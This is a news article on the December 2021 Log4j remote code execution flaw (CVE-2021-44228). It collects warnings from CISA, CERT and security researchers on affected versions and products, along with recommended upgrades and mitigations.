A serious code execution vulnerability in Log4j has security experts warning of potentially catastrophic consequences for enterprise organizations and web apps.
The vulnerability, listed as CVE-2021-44228 in the Apache Log4j Security Vulnerabilities log, enables remote attackers to take control of an affected system.
What is Log4j?
Log4j is an open source Apache logging system framework used by developers for recordkeeping within an application.
This exploit in the popular Java logging library results in Remote Code Execution (RCE). The attacker sends a malicious code string that, when logged by Log4j, allows the attacker to load Java on the server and take control.
Wired reports that attackers were using Minecraft’s chat function to exploit the vulnerability Friday afternoon.
Who Is Impacted By The Log4j Security Issue?
The issue is so severe that the United States Cybersecurity & Infrastructure Security Agency released a notice December 10 that states, in part:
“CISA encourages users and administrators to review the Apache Log4j 2.15.0 Announcement and upgrade to Log4j 2.15.0 or apply the recommended mitigations immediately.”
The log referenced above classifies the severity of the issue as ‘Critical’ and describes it as:
“Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints.
An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.”
Marcus Hutchins from MalwareTech.com warns that iCloud, Steam, and Minecraft have all been confirmed vulnerable:
This log4j (CVE-2021-44228) vulnerability is extremely bad. Millions of applications use Log4j for logging, and all the attacker needs to do is get the app to log a special string. So far iCloud, Steam, and Minecraft have all been confirmed vulnerable.
— Marcus Hutchins (@MalwareTechBlog) December 10, 2021
Free Wortley, CEO at LunaSec, wrote in a Dec 9 ‘RCE Zero-Day‘ blog post that, “Anybody using Apache Struts is likely vulnerable.”
He also said, “Given how ubiquitous this library is, the impact of the exploit (full server control), and how easy it is to exploit, the impact of this vulnerability is quite severe.”
CERT, the Austrian Computer Emergency Response Team, published a warning Friday that stated those impacted include:
“All Apache log4j versions from 2.0 up to and including 2.14.1 and all frameworks (e.g. Apache Struts2, Apache Solr, Apache Druid, Apache Flink, etc.) that use these versions.
According to the security company LunaSec, the JDK versions 6u211, 7u201, 8u191, and 11.0.1 are not affected in the default configuration, as this does not allow a remote codebase to be loaded.
However, if the option
com.sun.jndi.ldap.object.trustURLCodebase
istrue
set to, an attack is still possible.”
Rob Joyce, Director of Cybersecurity with the NSA, tweeted Friday that, “The log4j vulnerability is a significant threat for exploitation due to the widespread inclusion in software frameworks, even NSA’s GHIDRA.”
Security Expert Recommendations For Combating Log4j Vulnerabilities
Kevin Beaumont warns that even if you had upgraded to log4j-2.15.0-rc1, there was a bypass:
If you already upgraded code to use just released log4j-2.15.0-rc1, it’s still vulnerable – you now need to apply log4j-2.15.0-rc2 as there was a bypass. They is no stable release which fixes yet.
— Kevin Beaumont (@GossiTheDog) December 10, 2021
Marcus Hutchins from MalwareTech.com offers a workaround for those who can’t upgrade Log4j:
If you can’t upgrade log4j, you can mitigate the RCE vulnerability by setting log4j2.formatMsgNoLookups to True (-Dlog4j2.formatMsgNoLookups=true in JVM command line).
— Marcus Hutchins (@MalwareTechBlog) December 10, 2021
Matthew Prince, co-founder and CEO of Cloudflare, announced Friday:
“We’ve made the determination that #Log4J is so bad we’re going to try and roll out at least some protection for all Cloudflare customers by default, even free customers who do not have our WAF. Working on how to do that safely now.”
Chris Wysopal, co-founder and CTO at Veracode, recommends upgrading to a minimum of Java 8:
The patched version of log4j 2.15.0 requires a minimum of Java 8. If you are on Java 7 you will need to upgrade to Java8
When there is active exploitation and you need to patch fast it is beneficial if you have been updating your other dependencies over time.
— Chris Wysopal (@WeldPond) December 10, 2021
He also warns, “There may be only 5% of apps still on Java 7 but that is the long tail that will be exploited over the next months. Don’t have one of these in your org.”
Figuring out which applications in your organization use Log4j should be mission critical.
Featured image: Shutterstock/solarseven